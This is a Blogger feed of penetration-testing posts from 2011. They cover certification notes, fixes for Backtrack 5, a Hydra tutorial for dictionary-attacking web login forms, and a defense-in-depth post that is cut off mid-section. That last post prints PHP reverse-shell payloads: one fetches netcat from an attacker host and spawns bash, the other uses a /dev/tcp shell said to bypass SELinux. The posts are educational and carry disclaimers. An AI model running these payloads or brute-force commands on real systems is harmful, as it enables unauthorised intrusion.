Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com5tag:blogger.com,1999:blog-6428740549041097500.post-69700282074629599382011-08-25T20:09:00.003+01:002011-08-25T20:36:45.622+01:00GIAC Web Application Penetration Tester (GWAPT)I took and passed the <a href="http://www.giac.org/certification/web-application-penetration-tester-gwapt">GIAC Web Application Penetration Tester (GWAPT)</a> exam today, so I thought I would write something about it (and the SANS course that supports it).<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7eNMcddkpqrkG6y_I3lV9he8vGtd5IOlY6zrMJ_IaiH_rhrXZLeKmAg7P-sBhFGQU_jA3bBF3SpXzl9TI35v70yhwNK5QqsfYWX3oejlgdqv_xX0a0J2CrmDkLB6tNUdc_dc01AHkx28/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7eNMcddkpqrkG6y_I3lV9he8vGtd5IOlY6zrMJ_IaiH_rhrXZLeKmAg7P-sBhFGQU_jA3bBF3SpXzl9TI35v70yhwNK5QqsfYWX3oejlgdqv_xX0a0J2CrmDkLB6tNUdc_dc01AHkx28/s1600/logo.png" /></a></div><br />
<b>The SANS "Web Application Penetration Testing and Ethical Hacking" course coverage</b><br />
<br />
I had taken the SANS "on-demand" online version of their Web Application Penetration Testing course. I felt the online version of the course is a great format, because it gives you plenty of time to absorb the material and experiment in your own time.<br />
<br />
I had previously read the excellent book Web Application Hackers Handbook (which I would highly recommend, before considering the SANS course). There were a few key things on the SANS course that are not covered in that book (and vice versa)<br />
<div><br />
</div>On reflection, this course covers quite a lot of ground. It has the basics of various common attack vectors (such as SQL injection and XSS) but it goes beyond the norm in some areas (though some other attacks and detail seem to be missing).<br />
<br />
Additionally to what is covered in the WAHH book, the SANS course covers subject areas such as:<br />
<br />
Decomposition and basic analysis of Java applets and Flash objects<br />
Understanding AJAX<br />
Various tools for spidering, and Web app vulnerability scanning<br />
Exploitation frameworks<br />
<br />
Most notably, the SANS course covers the basics of a lot of different tools for web-app security testing, including:<br />
<br />
Burpsuite, Webscarab, Paros, Dirbuster, Skipfish, W3af, Tamperdata, SQLinjectMe, Sqlmap, Grendel-scan, Nikto, Aura, SiteDigger, Wikto, Goolag Scanner, Maltego, Nmap, HTTPrint, OpenSSL, THC SSL Check, CeWL, SprAJAX, RatProxy, WebService Studio, WSDigger, WSFuzzer, Flare, HP SWFscan, SWFIntruder, JAD, Websecurify, XSS Me, GreaseMonkey, XSS Assistant, PostInterpreter, Absinthe, MonkeyFist, BeEF, Dursosploit, AttackAPI<br />
<br />
This is a lot of coverage, though obviously in many cases we are talking about the bare minimum of one slide of notes per tool (you will need to do a lot of your own practice and research to get to know these tools properly).<br />
<br />
Though I didn't feel the SANS audio track was as good as it could have been, the course notes and lab examples are good (if you complete them all a couple of times, and do some extra experimentation).<br />
<br />
In addition, I did a lot of my own testing with the Web Security Dojo, and some Virtual Appliance UI research in my home lab - which I feel helped me a lot with understanding how to use some of the tools more effectively.<br />
<br />
<br />
<b>Notes for GWAPT test-takers</b><br />
<br />
This is an open-book exam, which was a new thing for me. I would definitely recommend test-takers to study the SANS course thouroughly, and take there course material with them, because the exam sticks very closely to the SANS course material.<br />
<br />
Also, make sure you know which information is in which section of the course material, i.e. know where you would find information on SQL injection syntax, or PHP functions, or HTTP response codes (as examples).<br />
<br />
In terms of practice, the certification exam is similar to (but not as easy as) the example tests provided by GIAC. I would also recommend reading the course material a couple of times, completing all the course practicals, and doing extra practice with the tools, such as completing the Web Security Dojo (or Web Goat at the very least).Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com20tag:blogger.com,1999:blog-6428740549041097500.post-80038239155191833322011-08-23T11:18:00.019+01:002011-09-10T06:23:27.300+01:00Backtrack 5 R1 - Some things fixed, some things broken + workaroundsSometimes installing the latest releases is a good thing. You get to learn lots of new technology, and improve your understanding and troubleshooting skills at the same time.<br />
<br />
However, there is a cost in time, tweaking and fixing things, and learning new ways to do the same things you used to do. Today Backtrack 5 R1 is only 3 days after release, so there are bound to be some issues. <br />
<br />
<br />
<b>Pluses and minuses</b><br />
<br />
Some things seem to work a lot better (for example I had none of my usual issues with graphics drivers, that I often get during a Backtrack install) <br />
<br />
However, some tools that were previously working fine seem to be broken (at least on the BT5 R1 KDE 64-bit version that I am currently looking at).<br />
<br />
<br />
Problems I have seen so far (and workarounds/fixes):<br />
<br />
<br />
<b>Wireshark not working</b><br />
<br />
Wireshark won't run - I got the following error:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">wireshark: error while loading shared libraries: libwsutil.so.0: cannot open shared object file: No such file or director </span><br />
<br />
The Backtrack development team are aware of this, and currently in the process of developing a fix.<br />
<br />
<span style="color: #cc0000;">Fix</span> = Rebuild wireshark from source<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Copy the following files, which fixes the problem:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><span style="font-family: "Courier New",Courier,monospace;">cp /usr/local/lib/libwsutil.so.1 /usr/lib/libwsutil.so.0</span><br />
<span style="font-family: "Courier New",Courier,monospace;">cp /usr/local/lib/libwiretap.so.1 /usr/lib/libwiretap.so.0</span><br />
<br />
<br />
<br />
<b>Nessus is missing</b><br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Fix</span> = Follow the instructions to download and install it here:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html">http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html</a><br />
<br />
<br />
<b>VMware Player not working</b><br />
<br />
VMware Player will install, but not compile and run - with the following errors in "/tmp/vmware-root/setup-*.log": <br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">Failed to compile module vmmon</div><br />
This is pretty essential for my home lab - probably more an issue that VMware need to fix, to make VMware Player work with the latest Linux Kernel.<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Use Oracle VirtualBox<br />
<br />
Download the "Ubuntu 10.04 LTS" version from here: <a href="http://www.virtualbox.org/wiki/Linux_Downloads">http://www.virtualbox.org/wiki/Linux_Downloads</a><br />
<br />
Run the following command to install it:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">dpkg -i virtualbox-4.1_4.1.2-73507~Ubuntu~lucid_amd64.deb</div><br />
If you already have VMware VMs, make a copy of these, and for each - in VirtualBox, add new machines, and select the *.vmdk files when you come to add the disk.<br />
<br />
This seems to work pretty well, and has more or less the same features as VMware Player.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV0hFUSL9xzkBggm83QJOjFusDOUcFH8rx0nF8UqqFkd-tzpFh3cFj6ZJgs7GDzsreyA_UXyA8mewGoNi2KVbLdsiNwyXT1SXYQkvudKSIAqLHZbL0BO097DIklM6n7xVglvyy1Q3CwAQ/s1600/snapshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV0hFUSL9xzkBggm83QJOjFusDOUcFH8rx0nF8UqqFkd-tzpFh3cFj6ZJgs7GDzsreyA_UXyA8mewGoNi2KVbLdsiNwyXT1SXYQkvudKSIAqLHZbL0BO097DIklM6n7xVglvyy1Q3CwAQ/s400/snapshot2.png" width="400" /></a></div><div style="text-align: center;">(Guess which VM is the victim ;o) </div><br />
<br />
<span style="color: #cc0000;">Workaround2</span> = See comment from Anonymous below (untested at this time)<br />
<br />
<br />
<b>Grendel-scan not working</b><br />
<br />
Grendel-scan throws the following Java exception:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><span style="font-family: 'Courier New',Courier,monospace;">Exception in thread "main" java.lang.UnsatisfiedLinkError: no swt-gtk-3349 or swt-gtk in swt.library.path, java.library.path or the jar file</span><br />
<br />
TBD - I guess I can get along without this for a while.<br />
<br />
<br />
<b>Mozilla Firefox not up-to-date</b><br />
<br />
Firefox is not the latest version (which could potentially be a security risk).<br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Fix</span> = Run the firefox built-in updater (to upgrade to Firefox 6.x)<br />
<br />
<ul><li>In firefox, go to Help > About</li>
<li>Click on "Check for updates"</li>
<li>Click on "Apply updates"</li>
<li>Follow the instructions (this will require a restart of firefox)</li>
<li>Follow the instructions to update the version of no-script</li>
</ul><br />
<br />
<b>Installing flash player for Chrome and Firefox</b><br />
<br />
Flash plugins are missing for Chrome and Firefox.<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Add the executable in the correct directories<br />
<br />
First download the kits at the following locations:<br />
<br />
<a href="http://labs.adobe.com/technologies/flashplatformruntimes/flashplayer11/">http://labs.adobe.com/technologies/flashplatformruntimes/flashplayer11/</a><br />
<a href="http://get.adobe.com/flashplayer/?no_redirect">http://get.adobe.com/flashplayer/?no_redirect</a><br />
<br />
Close both Chrome and Firefox and then do the following:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">cd ~/Download</div><div style="font-family: "Courier New",Courier,monospace;">tar xvfz flashplayer11_b2_install_lin_64_080811.tar.gz</div><div style="font-family: "Courier New",Courier,monospace;">chown root:root libflashplayer.so<br />
chmod 0644 libflashplayer.so<br />
cp -f libflashplayer.so /usr/lib/mozilla/plugins/<br />
rm -rf libflashplayer.so</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">tar xvfz install_flash_player_10_linux.tar.gz<br />
mkdir ~/.mozilla/plugins<br />
chown root:root libflashplayer.so<br />
chmod 0644 libflashplayer.so<br />
mv -f libflashplayer.so ~/.mozilla/plugins/</div><br />
Restart the browsers and this should fix it<br />
<br />
<br />
<b>Crash issue</b><br />
<br />
I did have an issue where I think it went into screen-save mode where the system seemed to go into a graphics-card test screen and completely lock-up (?! not sure on this one).<br />
<br />
Not seen this since<br />
<br />
<br />
<b>Suspend to disk causes failure to boot</b><br />
<br />
Yeah, this one is not much fun, seems persistent and I'm currently troubleshooting it... Hangs on red BT5 boot-loader screen.<br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Workaround</span> = Not sure, I re-installed my system, and have not seen the issue since. Weird.<br />
<br />
<br />
(I will add issues and workarounds as I find them in this post)Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com15tag:blogger.com,1999:blog-6428740549041097500.post-44134272127772265782011-08-22T13:34:00.007+01:002011-08-23T14:19:23.343+01:00Using Hydra to dictionary-attack web-based login formsHydra is a online password cracking tool which can be used to dictionary-attack various services by trying lists of user-names and passwords until a successful login is found. It is multi-threaded, and can be very fast, trying username/password combinations at a rate of thousands per minute.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhsXALeAfHUeXMgH54PrlNPb2748s8KynugHVuAnlFXLUJApih6oO6ABHWwCtaIo_G7u4PttLBv4nr1Z5Si8KFqzGIxE9QeVcqsUEwWmhPEkN6uGIsKnTicv6SXLjkiMq9nDTgLD1oKdk/s1600/xhydra.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhsXALeAfHUeXMgH54PrlNPb2748s8KynugHVuAnlFXLUJApih6oO6ABHWwCtaIo_G7u4PttLBv4nr1Z5Si8KFqzGIxE9QeVcqsUEwWmhPEkN6uGIsKnTicv6SXLjkiMq9nDTgLD1oKdk/s320/xhydra.png" width="320" /></a></div><br />
Hydra can be used to attack many different services including IMAP, SMB, HTTP, VNC, MS-SQL MySQL, SMTP, SSH, <a href="http://freeworld.thc.org/">and many more.</a><br />
<br />
(Hydra is to online-cracking of passwords, what John The Ripper is to offline-cracking of password hashes)<br />
<br />
Often, web-based login forms authenticate using the HTTP POST method, but judging from several blogs I have read on this subject, it sounds like some people have great difficulty in getting Hydra to work effectively in this situation.<br />
<br />
I have had a great deal of success with hydra, so here I describe how to get Hydra working with web-based form logins. <br />
<br />
This attack is not limited to websites, and I would argue that it is more suited for gaining login access to software products that have a web UI, for example in penetration tests.<br />
<br />
<span style="color: #cc0000;">This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.</span><br />
<br />
<br />
<b>Some differences between online and off-line password cracking</b><br />
<br />
There are significant differences between online and off-line password cracking. <br />
<br />
With off-line cracking, you have the hashes on your system, they are static, and you can try dictionary, hybrid, and brute force attacks to you hearts content. You have as long as you want, and you can try many billions of attempts in a short space of time.<br />
<br />
The attack success is purely dependent on password strength, verses processor-power and time (and few user-chosen passwords will be strong enough to last).<br />
<br />
With online password attacks there are more issues to consider, such as; network bandwidth, account lockouts, tar-pitting, changing passwords, detection in logs and IDS. <br />
<br />
Online attacks are more suited to relatively small and focused dictionary attacks rather than exhaustive brute-force.<br />
<br />
<br />
<b>A simple Hydra SSH example</b><br />
<br />
Here is a simple example of running a Hydra attack against an SSH server.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">hydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e ns -t 10</div><br />
This will attack the system 192.1.68.1.26, on port 22 with the SSH protocol, 10 threads at a time, and try all the combinations of usernames and passwords supplied in the files user.txt and pass.txt (+ empty passwords and passwords the same as the username)<br />
<br />
This can take a while, so it is best to only use usernames you know exist, and a relatively small list of passwords (many thousands rather than many millions). This attack generally works very well for simple dictionary passwords.<br />
<br />
<br />
<b>Web-based login forms prerequisites</b><br />
<br />
For web-based forms, you have to know much more information about the form you are attacking before you start the attack. Every web-based form is slightly different, different URLs and parameters, and different responses for success or failure.<br />
<br />
You need to know:<br />
<ul><li>The hostname/IP and URL</li>
<li>Whether it is a HTTPS or HTTP service</li>
<li>Whether the form supports GET or POST (or both)</li>
<li>The parameters of the request</li>
<li>The difference in response between success and failure</li>
<li>Whether any session cookies are required to be set or maintained</li>
<li>What lockout features and thresholds are enabled (if any)</li>
</ul>Not knowing or understanding the above information can be a big cause of failure.<br />
<br />
For the parameters of the request, you can intercept and examine a normal login attempt with a web proxy (such as owasp-zap, webscarab or burpsuite) or use a browser plugin (such as tamperdata) or just look at the HTML form.<br />
<br />
<br />
<b>An example attack</b><br />
<br />
The <a href="http://sourceforge.net/projects/websecuritydojo/">Web Security Dojo</a> VM has various vulnerable applications that you can use to test these techniques. So looking at an example the w3af testing framework has a test login at the following location<br />
<br />
http://192.168.1.69/w3af/bruteforce/form_login/<br />
<br />
The important parts of the HTML form are:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><form name="input" action="<span class="Apple-style-span" style="color: #cc0000;">dataReceptor.php</span>" method="<span class="Apple-style-span" style="color: #cc0000;">post</span>"></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Username:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><input type="text" name="<span class="Apple-style-span" style="color: #cc0000;">user</span>"></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Password:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><input type="password" name="<span class="Apple-style-span" style="color: #cc0000;">pass</span>"></span><br />
<br />
If we put in one wrong username and password combination we get:<br />
<br />
<form action="<font class=" apple-style-span"="" color="#cc0000" name="input"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span class="Apple-style-span" style="color: #cc0000;">Bad login</span>, stop bruteforcing me!Bad u/p combination for user: a</span><br />
<br />
So, now we have the information we need to attack this login form, we can use this info to construct a Hydra brute-force attack as follows:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
If we break this up<br />
<br />
Host = 192.168.1.69<br />
Method = http-form-post<br />
URL = /w3af/bruteforce/form_login/dataReceptor.php<br />
Form parameters = user=^USER^&pass=^PASS^<br />
Failure response = Bad login<br />
Users file = users.txt<br />
Password file = pass.txt<br />
Threads = -t 10<br />
Wait for timeout = -w 30<br />
Output file = -o hydra-http-post-attack.txt<br />
<br />
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:<br />
<br />
<div><br />
</div><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[DATA] attacking service http-post-form on port 80</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New',Courier,monospace;">[80][www-form] host: 192.168.1.69 login: admin password: 1234</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07</span><br />
<br />
As you can see, this was successful and found the user "admin" with password "1234".<br />
<br />
<br />
<b>Other examples</b><br />
<br />
HTTPS forms can be brute-forced in exactly the same way by changing the method to "https-form-post".<br />
<br />
Similarly there are the GET equivalents, of "http-get-form" and "https-get-form", though this type of method is really not recommended for web-based login forms (due to confidential information being passed in the URL, which can appear in proxy-logs, and browser history). Some forms do exist out there that use this.<br />
<br />
Sometimes you need to look for text that appears meaning "success" rather than the absence of text meaning "failure". This can be done if you put "S=" in front of the failure string variable, it becomes a success string check, for example<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">"/login.php:user=^USER^&pass=^PASS^:S=successful"</span><br />
<br />
Remember that the "failure" or "success" string does not have to be part of the HTML of the page. These strings could be information in the response headers, such as cookies being set, or locations of redirects. There are flexible options for dealing with pretty much any type of response, as long as it is repeatable, and there are distinct differences between success and failure.<br />
<br />
Other more complex examples may be where you need to specify particular header values, or use an additional page to obtain set browser cookies before the form is submitted. These can be done by adding the additional parameters "C=" and "H=" on the end:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">"/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo"</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div>All in all, this is a pretty straight forward, and a very effective tool, as long as you understand how the form is working, and what parameters are required, before you start the attack.</form>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com350tag:blogger.com,1999:blog-6428740549041097500.post-84074331288254129742011-08-21T21:46:00.002+01:002011-08-24T09:45:49.919+01:00A few other tips for Backtrack 5 graphics drivers issues, and software installsHaving rebuilt my main BT5 laptop again today, here are some tips I can share for anyone else who has the same needs (and to hopefully this will help make it quicker for me if I want to rebuild the same setup again)<br />
<br />
I already made some suggestions for my Desktop system (when I installed that with Backtrack 5) but that covered Nvidia graphics drivers, and other software installs:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/05/overcoming-problems-installing.html">http://insidetrust.blogspot.com/2011/05/overcoming-problems-installing.html</a><br />
<br />
I'm currently using BT5 KDE 64-bit on a Dell Inspiron 17R 7010 - This has a nice big screen, which is useful for virtual hosts etc...<br />
<br />
Anyway, the reason for the rebuild was that; initially a kernel update (2.6.39.4) stopped various packages from working. So I thought I would try out BT5 R1 KDE 64-bit, but then after an abortive install of R1, I've gone back to my previous stable setup (I haven't got to the bottom of the kernel and R1 issues yet, maybe more on that next time)<br />
<br />
So, after a standard install of BT5...<br />
<br />
<br />
<b>Intel graphics drivers</b><br />
<br />
My laptop has Intel graphics drivers and initially "startx" would result in a black screen, and lockup with no errors. I got a solution previously speaking to some of the folks on the #backtrack-linux IRC channel a while back (I couldn't remember it exactly, but I figured it out for myself this time, but thanks to a_landim_xhkl and _ope_ for the original feedback).<br />
<br />
A basic way to get the Intel graphics driver working is to reconfigure /boot/grub/grub.cfg , but this needs to be done via the template files and grub config builder.<br />
<br />
You need to edit the file /etc/default/grub and added the Intel option (back it up first)<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">cp /etc/default/grub /etc/default/grub.old</div><br />
... then edit the following line adding the options in red:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">GRUB_CMDLINE_LINUX="<span style="color: #cc0000;">text splash vga=791 i915.modeset=1</span>"</span><br />
<br />
Then rebuild the grub config and reboot:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">grub-mkconfig -o /boot/grub/grub.cfg</div><div style="font-family: "Courier New",Courier,monospace;">init 6</div><br />
<br />
<b>The BT5 KDE 64-bit gotcha</b><br />
<br />
We're not out of the woods yet for KDE, but this one has been mentioned over and over in various places - this is the known issue where KDE crashes out after the first Chinese symbol on the red starting screen.<br />
<br />
If you are using BT5 KDE 64-bit you will likely need to do the following before you can run startx<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-root/icon-cache.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-root/plasma_theme_Volatile.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-bt/icon-cache.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-bt/plasma_theme_Volatile.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm -rf /var/tmp/kdecache-root</span><br />
<br />
After that KDE starts fine, now to install some extra stuff...<br />
<br />
<br />
<b>Installing and running VMware Player</b><br />
<br />
Download VMware Player<br />
<br />
<a href="http://downloads.vmware.com/d/details/player_314/ZGp0YnR0KnRiZGh0QA==">http://downloads.vmware.com/d/details/player_314/ZGp0YnR0KnRiZGh0QA==</a> <br />
<br />
Then you need the kernel sources in order to install and run VMware Player. Run the following (and go do something else while it does it's thing)<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">prepare-kernel-sources</span><br />
<br />
Then run the install, and this should work fine<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">./VMware-Player-3.1.4-385536.x86_64.bundle</span><br />
<br />
<br />
<b>Installing and running Google Chrome</b><br />
<br />
Download the <a href="http://www.google.com/chrome/eula.html?hl=en-GB&platform=linux_ubuntu_x86_64">latest 64 bit Google Chrome build</a> and then do:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">dpkg -i ./google-chrome-stable_current_amd64.deb</div><br />
You may get a complaint about running this as root, so either create an account for browsing, or start the browser with the following command<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">/opt/google/chrome/google-chrome %U --user-data-dir</span><br />
<br />
(I've seen some ridiculously complex suggested ways of doing this, such as hex-editing binaries, the above seems like the easiest by far)<br />
<br />
You can either run this from the command line, or easier still, change the shortcut command to the above. This works very well as of Chrome version 13.0.782.215.<br />
<br />
<br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com286tag:blogger.com,1999:blog-6428740549041097500.post-24747374798589240562011-07-05T12:07:00.006+01:002011-07-10T17:10:46.944+01:00I've passed the OCSE (Offensive Security Certified Expert) examI didn't blog much last month, as I have been researching and studying hard.<br />
<br />
Anyway, I am pleased to announce that I have passed the Offensive Security Certified Expert exam (<a href="http://www.offensive-security.com/online-information-security-training/cracking-the-perimeter/">OSCE</a>), which is the certification for the "Cracking The Perimeter" course I took earlier this year.<br />
<br />
This is a monster 48 hour exam (+24 hours for documentation). It covers techniques such as advanced web attacks, vulnerability discovery, exploit development, custom payload creation, detection avoidance, and advanced network attacks.<br />
<br />
It's pretty specialized stuff (you have to pass a hacking challenge to even register for the course, and trust me, if you can't pass that challenge, you are definitely not ready ;o)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDFI7vo3i8V1bwew3XoycD6CDqwVo4zXltrwb3nxbGgbMNVB1YhYNzuRb5rKyXo2IFG31LgDv1ZBm3UWAXLq99P42YXsWaqFVkTZE7NZhYgVaZyI0lQuVA_K8o14EJGjanj-t4fLdTr4A/s1600/ctp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDFI7vo3i8V1bwew3XoycD6CDqwVo4zXltrwb3nxbGgbMNVB1YhYNzuRb5rKyXo2IFG31LgDv1ZBm3UWAXLq99P42YXsWaqFVkTZE7NZhYgVaZyI0lQuVA_K8o14EJGjanj-t4fLdTr4A/s400/ctp.png" width="400" /></a></div><br />
The CTP course was great, though I would say that anyone attempting the OCSE certification needs to do a lot of extra practice and study, to get to the level where they can creatively and confidently exploit various different types of systems and applications (especially some exploit-development research) before they take the exam.<br />
<br />
It's definitely one of the most challenging certifications I have done (I have done quite a few recently) - and I feel that my skill levels have shot up as a result.<br />
<br />
My next plans are<br />
1) Continuing my research project<br />
2) Taking the GWAPT exam<br />
3) Crest CHECK Certification (which seems to be very important for pen-testing jobs in the UK)Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com26tag:blogger.com,1999:blog-6428740549041097500.post-25479131096528977392011-06-24T13:43:00.036+01:002011-06-29T09:14:40.280+01:00Webserver defense-in-depth - Hackers vs SELinux and restricted accountsWeb attacks are often a first phase of an attack against internet-facing Linux servers. However, these days unless a system is very badly configured, internet-facing services are usually run with a service account that has very limited rights, such as "apache". <br />
<br />
This has a huge security benefit as part of a defense-in-depth policy. Having this limited service account means that, even if vulnerabilities are found in the website, attackers can be prevented from escalating privileges and gaining complete control of the system.<br />
<br />
If you are currently running internet-facing services as root you should REALLY look at this issue and do something about it, because in this situation a single common website vulnerability could lead an attacker quickly to full system compromise. Game over.<br />
<br />
Having said this, let's look at some of the other components for defense-in-depth of web-servers.<br />
<br />
<span style="color: #cc0000;">This information is intended for educational purposes. It is important to understand these issues if you design or maintain systems, but please only test in your own test environment.</span><br />
<br />
<b>Let's work with an example</b><br />
<br />
Say a company is running a web-server that contains website vulnerabilities that they are unaware of.<br />
<br />
However, on the plus side, say their web-server is running as "apache", and their platform is the latest RedHat Linux 5.6 (with up-to-date patches)<br />
<br />
If an attacker could use the website vulnerabilities to introduce server-side code, they may aim to get a reverse-shell with some PHP code like this example:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">echo shell_exec('wget http://-attackersip-<attackers ip="">/nc -O /tmp/nc');</attackers></div><div style="font-family: "Courier New",Courier,monospace;">echo shell_exec('chmod +x /tmp/nc');</div><span style="font-family: "Courier New",Courier,monospace;">echo shell_exec('/tmp/nc </span><span style="font-family: "Courier New",Courier,monospace;">-attackersip-</span><span style="font-family: "Courier New",Courier,monospace;"> </span><span style="font-family: "Courier New",Courier,monospace;">-attackersport-</span><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New",Courier,monospace;"> </span><attackers ip=""> <attackers port=""><span style="font-family: "Courier New",Courier,monospace;"> -e /bin/bash');</span><br />
<span style="font-family: "Courier New",Courier,monospace;"></span></attackers></attackers></span><br />
<br />
If they can write this code to somewhere and run it from the web-server this would effectively upload the netcat tool from the attackers system to the web-server, and use it to connect back to the attacker giving them a command shell in the context of the web-server account. (good job the web-server was not running as root!)<br />
<br />
The attacker would get a reverse shell, as apache, which they would then need to find a way to escalate (either by a kernel exploit, or some other local privilege escalation exploit).<br />
<br />
This may take them some time, and they may be detected whilst they try to do this.<br />
<br />
(It's a maybe, but if the manage it they can then cover their tracks.)<br />
<br />
<b><br />
A more secure platform - with SELinux</b><br />
<br />
OK, so lets say that the web-server is running as "apache", the system is RedHat Linux 5.6 (with up-to-date patches), and SELinux is enabled, with the default security configurations.<br />
<br />
SELinux can prevent running of files and services. This can be pretty confusing for an attacker who is not familiar with SELinux because although they may get some limited control, most of their commands will fail for no apparent reason.<br />
<br />
This can stop the previous netcat shell example from working, because netcat is trying to make an outbound connection to the attacker as "apache".<br />
<br />
<b><br />
</b><br />
<b>Working around SELinux</b><br />
<br />
To work around this above shell issue an attacker can use a netcat-less shell technique, to get a command shell. (again, this is PHP)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">echo shell_exec('cd /tmp && exec /bin/bash 0</dev/tcp/-attackersip-/-attackersport- 1>&0 2>&0 &');</span><br />
<span style="font-family: "Courier New",Courier,monospace;"></span><br />
<attackers port=""> <br />
This shell technique has several advantages:<br />
</attackers><br />
<ul><li><attackers port=""> It provides a reasonably useable command shell</attackers></li>
<li><attackers port=""> It does not require any code to be uploaded to the victim server</attackers></li>
<li><attackers port=""> It bypasses SELinux in most situations</attackers></li>
<li><attackers port=""> It works on most versions of Linux, and even Mac OSX or Solaris!</attackers></li>
<ul><li><i><attackers port="">The shell, file ("0"), and directory may need to be changed depending on availability (The directory and file "0" must be writable).</attackers></i></li>
</ul></ul><br />
<attackers port=""><b>More SELinux problems for the attacker</b><br />
<br />
